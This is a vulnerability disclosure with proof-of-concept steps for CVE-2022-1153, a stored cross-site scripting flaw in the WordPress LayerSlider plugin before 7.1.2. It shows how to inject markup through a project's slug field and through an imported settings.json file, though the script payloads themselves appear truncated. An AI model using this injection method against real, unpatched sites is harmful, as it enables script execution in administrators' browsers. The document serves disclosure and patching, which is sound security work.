Tittle: WordPress Plugin LayerSlider < 7.1.2 - Admin+ Stored Cross-Site Scripting References: CVE-2022-1153 Author: Taurus Omar Description: The plugin does not sanitise and escape Project's slug before outputting it back in various place, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed. Affects Plugins: LayerSlider - Fixed in version 7.1.2 Proof of Concept: 1.) The stored XSS is done in the template slug of any slider, a javascript payload is added to the SLUG input, which stores the malicious script executing the payload during the reopening of the template or when accessing different functions of the slider. 2.) The vulnerability also allows loading a configuration file (settings.json) with the malicious payload allowing it to be executed within the Slider edition. ## POC1: via (slug slider) 1.) Add new project & Put Name 2.) Create Blank Project 3.) Project Settings & Tab Publish 4.) Add malicious code in the SLUG: "> 5.) Exit 6.) Save Project 7.) XSS will trigger when accessing the project again for example (there seem to be other place when its triggered as well, like in the Project's settings) ## POC2 via (file,json) 1.) Add new post & Create Blank Project 2.) Import Projects 3.) Load file.json {"properties":{"sliderVersion":"7.x","title":"Via Json","slug":"\">'>","status":true,"schedule_start":"","schedule_end":"","type":"responsive","popupFitWidth":"","popupFitHeight":"","popupPositionHorizontal":"center","popupPositionVertical":"middle","popupWidth":"640","popupHeight":"360","popupDistanceTop":"10","popupDistanceRight":"10","popupDistanceBottom":"10","popupDistanceLeft":"10","popupShowOnTimeout":"","popupShowOnIdle":"","popupShowOnScroll":"","popupShowOnClick":"","popupCloseOnTimeout":"","popupCloseOnScroll":"","popup_repeat":true,"popup_repeat_days":"","popupShowOnce":true,"popup_pages_custom":"","popup_pages_exclude":"","popup_roles_administrator":true,"popup_roles_editor":true,"popup_roles_author":true,"popup_roles_contributor":true,"popup_roles_subscriber":true,"popup_roles_customer":true,"popup_roles_visitor":true,"popupTransitionIn":"fade","popupDurationIn":"1000","popupDelayIn":"200","popupTransitionOut":"fade","popupDurationOut":"500","popupResetOnClose":"slide","popupShowCloseButton":true,"popupCloseButtonStyle":"","popupOverlayClickToClose":true,"popupOverlayBackground":"rgba(0,0,0,.85)","popupOverlayTransitionIn":"fade","popupOverlayDurationIn":"400","popupOverlayTransitionOut":"fade","popupOverlayDurationOut":"400","width":1280,"height":720,"maxwidth":"","responsiveunder":"","fullSizeMode":"normal","fitScreenWidth":true,"allowFullscreen":true,"maxRatio":"","insertMethod":"prependTo","insertSelector":"","clipSlideTransition":"disabled","preventSliderClip":true,"hideunder":"","hideover":"","slideOnSwipe":true,"optimizeForMobile":true,"firstlayer":"1","autostart":true,"startinviewport":true,"pauseonhover":"disabled","keybnav":true,"touchnav":true,"playByScrollSpeed":"1","loops":"0","forceloopnum":true,"skin":"v6","sliderfadeinduration":"350","sliderclass":"","sliderstyle":"margin-bottom: 0px;","backgroundcolor":"","globalBGRepeat":"no-repeat","globalBGAttachment":"scroll","globalBGPosition":"50% 50%","globalBGSize":"auto","navprevnext":true,"navstartstop":true,"navbuttons":true,"hoverprevnext":true,"circletimer":true,"thumb_nav":"hover","thumb_container_width":"60%","thumb_width":"100","thumb_height":"60","thumb_active_opacity":"35","thumb_inactive_opacity":"100","autoplayvideos":true,"rememberUnmuteState":true,"autopauseslideshow":"auto","youtubepreview":"maxresdefault.jpg","slideBGSize":"cover","slideBGPosition":"50% 50%","parallaxSensitivity":"10","parallaxCenterLayers":"center","parallaxCenterDegree":"40","forceLayersOutDuration":"750","useSrcset":"inherit","enhancedLazyLoad":"inherit","preferBlendMode":"disabled","createdWith":"7.0.7"},"layers":[{"properties":{"post_offset":-1,"3d_transitions":"","2d_transitions":"","custom_3d_transitions":"","custom_2d_transitions":"","bgcolor":"","bgposition":"inherit","bgsize":"inherit","slidedelay":"","timeshift":0,"transitionduration":"","kenburnszoom":"disabled","kenburnsscale":1.2,"kenburnsrotate":"","globalhover":false,"parallaxtype":"2d","parallaxevent":"cursor","parallaxaxis":"both","parallaxdistance":10,"parallaxrotate":10,"parallaxdurationmove":1500,"parallaxdurationleave":1200,"parallaxtransformorigin":"50% 50% 0","parallaxtransformperspective":500,"layer_link":"","linkId":"","linkName":"","linkType":"","layer_link_target":"_self","layer_link_type":"over","deeplink":"","overflow":false,"customProperties":[],"post_content":false,"schedule_start":"","schedule_end":""},"sublayers":[],"meta":{"undoStackIndex":-1},"history":[]}]} Classification: Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS) CWE-79 wpScan: https://wpscan.com/vulnerability/1d9d5516-f1c3-4134-b6bf-7f2f890533c4